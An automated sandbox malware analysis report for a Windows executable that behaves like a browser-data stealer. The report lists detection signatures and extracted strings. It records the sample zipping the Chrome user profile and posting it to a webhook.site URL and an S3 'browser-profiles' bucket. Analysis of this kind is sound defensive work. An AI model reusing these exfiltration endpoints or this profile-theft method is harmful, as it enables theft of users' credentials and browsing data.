Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1495966
MD5:1f6c6f36d126cd027ded1915e321c693
SHA1:41645700d79852f1d2bac3ca637e8b07245574de
SHA256:cc3557f4fdaad9aa47bf46dce4f0a8e0a45d7e81084962a54b67b4f55f8bf64c
Tags:exe
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Contains functionality to registers a callback to get notified when the system is suspended or resumed (often done by Miners)
Installs new ROOT certificates
Potentially malicious time measurement code found
Tries to harvest and steal browser information (history, passwords, etc)
Contains functionality for execution timing, often used to detect debuggers
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Stores large binary data to the registry

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2644 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1F6C6F36D126CD027DED1915E321C693)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 81.4% probability

Bitcoin Miner

barindex
Contains functionality to registers a callback to get notified when the system is suspended or resumed (often done by Miners)
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006D4F40 LoadLibraryExW,2_2_006D4F40
Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then shr r10, 0Dh2_2_006CE200
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then lock or byte ptr [rdx], dil2_2_006C22A0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp rdx, rbx2_2_006AC740
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp rdx, 40h2_2_006C1B60
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then shr r10, 0Dh2_2_006CCD80
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: file.exe, 00000002.00000002.1500245617.000000C0004C3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: _apps":["aohghmighlieiainnegkcijnfilokake","aapocclcgogkmnckokdopfmhonfmgoek","felcaaldnbdncclmgdcncolpebgiejap","apdfllckaahabafndbhieahigkjlhalf","pjkljhegncpnkpknbcohdijeoejaedia","blpcfgokakmgnkcojhhkbfbldkacnbeo"]},"zerosuggest":{"cachedresults":")]}'\n[\"\",[\"michigan hockey johnny druskinis\",\"annular solar eclipse\",\"dow jones stock markets futures\",\"the morning show recap episode 5\",\"diablo 4 season 2 patch notes\",\"aritzia archive sale\",\"premier league tottenham liverpool\",\"chucky season 3 cast\"],[\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[],{\"google:clientdata\":{\"bpc\":false,\"tlw\":false},\"google:groupsinfo\":\"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\\u003d\",\"google:suggestdetail\":[{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002}],\"google:suggestrelevance\":[1257,1256,1255,1254,1253,1252,1251,1250],\"google:suggestsubtypes\":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],\"google:suggesttype\":[\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\"]}]"}},"managed":{"banner_state":2},"managed_user_id":"","name":"Person 1","password_account_storage_settings":{}},"protection":{"macs":{}},"safebrowsing":{"enabled":false,"enhanced":false,"event_timestamps":{},"metrics_last_log_time":"13340965310"},"sessions":{"event_log":[{"crashed":false,"time":"13340965310874395","type":0},{"did_schedule_command":true,"first_session_service":true,"tab_count":1,"time":"13340965314121830","type":2,"window_count":1},{"crashed":false,"time":"13340965340486488","type":0},{"did_schedule_command":true,"first_session_service":true,"tab_count":1,"time":"13340965347697726","type":2,"window_count":1},{"crashed":false,"time":"13340965894520000","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340965895529112","type":2,"window_count":0},{"crashed":false,"time":"13340965896647302","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340965897562572","type":2,"window_count":0},{"crashed":false,"time":"13340965899453521","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340965900388040","type":2,"window_count":0},{"crashed":false,"time":"13340965902527967","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340965907495322","type":2,"window_count":0},{"crashed":false,"time":"13340965909466868","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340965910838554","type":2,"window_count":0},{"crashed":false,"time":"13340965912890131","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340965913778449","type":2,"window_count":0}],"session_data_status":5},"settings":{"a11y":{"apply_page_colors_only_on_increased_contrast":true}},"signin":{"allowed":true},"spellcheck":{"d
Source: file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: webhook.site
Source: global trafficDNS traffic detected: DNS query: s3.ap-southeast-1.wasabisys.com
Source: unknownHTTP traffic detected: POST /efe6628a-60cc-4d7a-bd08-479e31e08de5 HTTP/1.1Host: webhook.siteUser-Agent: Go-http-client/1.1Content-Length: 284Content-Type: application/jsonAccept-Encoding: gzip
Source: file.exeString found in binary or memory: http://s3.amazonaws.com/doc/2006-03-01/
Source: file.exe, 00000002.00000002.1500245617.000000C0004F2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://s3.amazonaws.com/doc/2006-03-01/The
Source: file.exe, 00000002.00000002.1496286874.000000C0003C6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://s3.amazonaws.com/doc/2006-03-01/https://s3.ap-southeast-1.wasabisys.com/browser-profiles/2024
Source: file.exe, 00000002.00000002.1496286874.000000C000185000.00000004.00001000.00020000.00000000.sdmp, Web Data.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Network Persistent State.2.drString found in binary or memory: https://accounts.google.com
Source: file.exe, 00000002.00000002.1496286874.000000C000185000.00000004.00001000.00020000.00000000.sdmp, Web Data.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000002.00000002.1496286874.000000C000185000.00000004.00001000.00020000.00000000.sdmp, Web Data.2.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000002.00000002.1496286874.000000C000185000.00000004.00001000.00020000.00000000.sdmp, Web Data.2.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Network Persistent State.2.drString found in binary or memory: https://chrome.google.com
Source: file.exe, 00000002.00000002.1500245617.000000C00051C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/
Source: file.exe, 00000002.00000002.1500245617.000000C000509000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
Source: Top Sites.2.drString found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Top Sites.2.drString found in binary or memory: https://chrome.google.com/webstore?hl=enWeb
Source: Network Persistent State.2.drString found in binary or memory: https://clients2.google.com
Source: file.exe, 00000002.00000002.1500245617.000000C0004CD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
Source: Network Persistent State.2.drString found in binary or memory: https://clients2.googleusercontent.com
Source: Reporting and NEL.2.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/chromewebstore
Source: Reporting and NEL.2.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://docs.google.com/document/:
Source: file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://docs.google.com/document/J
Source: file.exe, 00000002.00000002.1500245617.000000C0004C3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://docs.google.com/presentation/:
Source: file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://docs.google.com/presentation/J
Source: file.exe, 00000002.00000002.1500245617.000000C0004C3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://docs.google.com/spreadsheets/:
Source: file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://docs.google.com/spreadsheets/J
Source: file.exe, 00000002.00000002.1500245617.000000C0004C3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://drive.google.com/:
Source: file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://drive.google.com/?lfhs=2
Source: file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://drive.google.com/J
Source: file.exe, 00000002.00000002.1500245617.000000C0004C3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: file.exe, 00000002.00000002.1496286874.000000C000185000.00000004.00001000.00020000.00000000.sdmp, Web Data.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000002.00000002.1496286874.000000C000185000.00000004.00001000.00020000.00000000.sdmp, Web Data.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000002.00000002.1496286874.000000C000185000.00000004.00001000.00020000.00000000.sdmp, Web Data.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://mail.google.com/mail/:
Source: file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://mail.google.com/mail/J
Source: file.exe, 00000002.00000002.1500245617.000000C0004C3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: file.exe, 00000002.00000002.1500245617.000000C0004CD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: file.exe, 00000002.00000002.1500245617.000000C000414000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1500245617.000000C00040A000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1496286874.000000C0003EE000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1496286874.000000C00019E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240820122501-19882742-CC56-1A59-9779-FB8C
Source: file.exe, 00000002.00000002.1496286874.000000C0003C6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://s3.ap-southeast-1.wasabisys.com/browser-profiles/202408220240820122501-19882742-CC56-1A59-97
Source: file.exe, 00000002.00000002.1500245617.000000C0004CD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: Network Persistent State.2.drString found in binary or memory: https://update.googleapis.com
Source: file.exe, 00000002.00000002.1496286874.000000C0003C6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de5
Source: file.exe, 00000002.00000002.1500245617.000000C00053E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de5;
Source: file.exe, 00000002.00000002.1496286874.000000C0003C6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de5https://webhook.site/efe6628a-60cc-4d7a-bd0
Source: file.exe, 00000002.00000002.1496286874.000000C000185000.00000004.00001000.00020000.00000000.sdmp, Web Data.2.drString found in binary or memory: https://www.ecosia.org/newtab/
Source: Network Persistent State.2.drString found in binary or memory: https://www.google.com
Source: file.exe, 00000002.00000002.1500245617.000000C000509000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
Source: file.exe, 00000002.00000002.1496286874.000000C000185000.00000004.00001000.00020000.00000000.sdmp, Web Data.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Network Persistent State.2.drString found in binary or memory: https://www.googleapis.com
Source: file.exe, 00000002.00000002.1500245617.000000C0004CD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
Source: file.exe, 00000002.00000002.1500245617.000000C0004CD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: file.exe, 00000002.00000002.1500245617.000000C0004CD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: file.exe, 00000002.00000002.1500245617.000000C0004CD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra
Source: file.exe, 00000002.00000002.1500245617.000000C0004CD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://www.youtube.com/:
Source: file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://www.youtube.com/?feature=ytca
Source: file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://www.youtube.com/J
Source: file.exe, 00000002.00000002.1500245617.000000C0004C3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006D71602_2_006D7160
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006A21E02_2_006A21E0
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006E81E02_2_006E81E0
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006CA2602_2_006CA260
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006AE2002_2_006AE200
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006C94602_2_006C9460
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006AD6602_2_006AD660
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006B76202_2_006B7620
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006E18002_2_006E1800
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006DEA602_2_006DEA60
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006C6D602_2_006C6D60
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006E0D802_2_006E0D80
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006BC0E02_2_006BC0E0
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006DE1002_2_006DE100
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006C81A02_2_006C81A0
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006D11802_2_006D1180
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006CD2402_2_006CD240
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006EC2402_2_006EC240
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006B62202_2_006B6220
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006CE2002_2_006CE200
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_007143002_2_00714300
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006D04002_2_006D0400
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006C25202_2_006C2520
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006DA5202_2_006DA520
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006FF5202_2_006FF520
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006BB5002_2_006BB500
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006CF5E02_2_006CF5E0
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006F45A02_2_006F45A0
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006BA7602_2_006BA760
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006AA8202_2_006AA820
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006BF8E02_2_006BF8E0
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006E29C02_2_006E29C0
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006EF9802_2_006EF980
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00706AA02_2_00706AA0
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00713BE02_2_00713BE0
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006BBBC02_2_006BBBC0
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00709BA92_2_00709BA9
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006DAD602_2_006DAD60
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006F2D602_2_006F2D60
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006AEDC02_2_006AEDC0
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006CCD802_2_006CCD80
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006A3E402_2_006A3E40
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006C3E002_2_006C3E00
Source: C:\Users\user\Desktop\file.exeCode function: 2_2_006D3F002_2_006D3F00
Source: C:\Users\user\Desktop\file.exeCode function: String function: 006D9860 appears 35 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 006D9780 appears 526 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 006DB280 appears 58 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 006DBAA0 appears 580 times
Source: file.exeStatic PE information: Number of sections : 16 > 10
Source: file.exeStatic PE information: Section: /19 ZLIB complexity 1.0001107034412955
Source: file.exeStatic PE information: Section: /32 ZLIB complexity 0.9969095130522089
Source: file.exeStatic PE information: Section: /65 ZLIB complexity 0.99909375
Source: file.exeStatic PE information: Section: /78 ZLIB complexity 0.9930839740410053
Source: classification engineClassification label: mal60.spyw.evad.mine.winEXE@1/84@3/3
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\user_data.zipJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\system32\159c85fd8ac91c243a0bb614b794fc4d65de71054db26d9a64361d411413c9c7AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJump to behavior
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Affiliation Database.2.drBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: Login Data For Account.2.dr, Login Data.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exeString found in binary or memory: runtime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:sec
Source: file.exeString found in binary or memory: runtime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:sec
Source: file.exeString found in binary or memory: concurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:sec
Source: file.exeString found in binary or memory: concurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:sec
Source: file.exeString found in binary or memory: /cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.ins
Source: file.exeString found in binary or memory: /cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.ins
Source: file.exeString found in binary or memory: /cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power
Source: file.exeString found in binary or memory: /cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power
Source: file.exeString found in binary or memory: /memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent loc
Source: file.exeString found in binary or memory: /memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent loc
Source: file.exeString found in binary or memory: /gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus old
Source: file.exeString found in binary or memory: /gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus old
Source: file.exeString found in binary or memory: /sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack
Source: file.exeString found in binary or memory: /sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack
Source: file.exeString found in binary or memory: /memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspin
